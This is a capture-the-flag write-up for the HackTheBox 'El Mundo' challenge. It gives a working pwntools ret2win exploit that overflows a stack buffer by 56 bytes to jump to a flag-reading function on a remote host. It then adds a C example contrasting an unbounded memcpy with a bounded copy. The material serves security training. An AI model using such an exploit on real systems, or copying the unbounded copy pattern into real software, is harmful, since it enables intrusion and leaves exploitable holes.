HackTheBox El Mundo Challenge
https://app.hackthebox.com/challenges/820
Description
You may not control time, but you can certainly control the flow of your program! Use your stand to bend it to your will!
Exploitation
#!/usr/bin/python3
import sys
from pwn import *

fname = './el_mundo'
e = ELF(fname)                  # load the local binary (also sets context.arch)

read_flag_addr = 0x4016b7       # address of the flag-reading function in the binary
offset = 56                     # bytes from the start of the buffer to the saved return address

# Padding up to the saved return address, then the address of the flag-reading function.
payload = flat([
    b'A' * offset,
    p64(read_flag_addr)
])

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except (IndexError, ValueError):
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

r = get_process()
try:
    r.sendlineafter(b'> ', payload)   # wait for the prompt, then send the overflow
    for _ in range(3):
        try:
            output = r.recv(timeout=1)
            print(output.decode('utf-8', errors='ignore'))
            if b"HTB" in output:
                print("Flag found!")
                break
        except EOFError:
            continue
except Exception as exc:
    print(f"Error occurred: {exc}")
finally:
    r.close()
Summary
El Mundo: calculate the overflow offset, redirect control flow, and land a reliable flag read.
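To show the bug class this ret2win relies on from the defensive side, here is an added C example (not code from the challenge binary or from the original writeup) contrasting the unbounded copy with a bounded one. The 48-byte buffer and the 8-byte saved frame pointer are assumptions chosen so that the return address lands at the writeup's offset of 56; the real binary's layout is not on the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: a 48-byte stack buffer; with the 8-byte saved frame pointer
 * that puts the saved return address 56 bytes in, the offset the writeup uses. */
#define BUF_SIZE 48

/* Vulnerable pattern: the copy length comes from the caller (i.e. from the size
 * of untrusted input), not from sizeof(buf). With len > BUF_SIZE the write runs
 * past the buffer, over the saved rbp, and into the saved return address. */
size_t vulnerable_copy(const char *src, size_t len) {
    char buf[BUF_SIZE] = {0};
    size_t n = 0;
    memcpy(buf, src, len);                 /* no bound check: the overflow */
    while (n < BUF_SIZE && buf[n] != '\0') n++;
    return n;                              /* bytes stored (only meaningful if len <= BUF_SIZE) */
}

/* Hardened form: the bound is derived from the buffer, oversized input is
 * truncated, and the result is always NUL-terminated. Returns bytes stored. */
size_t bounded_copy(const char *src, size_t len) {
    char buf[BUF_SIZE];
    size_t n = len < BUF_SIZE - 1 ? len : BUF_SIZE - 1;
    memcpy(buf, src, n);
    buf[n] = '\0';
    return strlen(buf);
}

/* Distance from the start of a stack buffer to the saved return address on
 * x86-64: the buffer, then the 8-byte saved rbp pushed by the prologue.
 * Assumes the compiler placed no padding between the two. */
size_t return_address_offset(size_t buf_size) {
    return buf_size + 8;
}

int main(void) {
    char big[200];
    memset(big, 'A', sizeof big);          /* constructed oversized input */
    printf("return address offset for a %d-byte buffer: %zu\n",
           BUF_SIZE, return_address_offset(BUF_SIZE));
    printf("bounded_copy stored %zu of %zu bytes\n",
           bounded_copy(big, sizeof big), sizeof big);
    /* vulnerable_copy(big, sizeof big) would corrupt this frame; not called. */
    return 0;
}
```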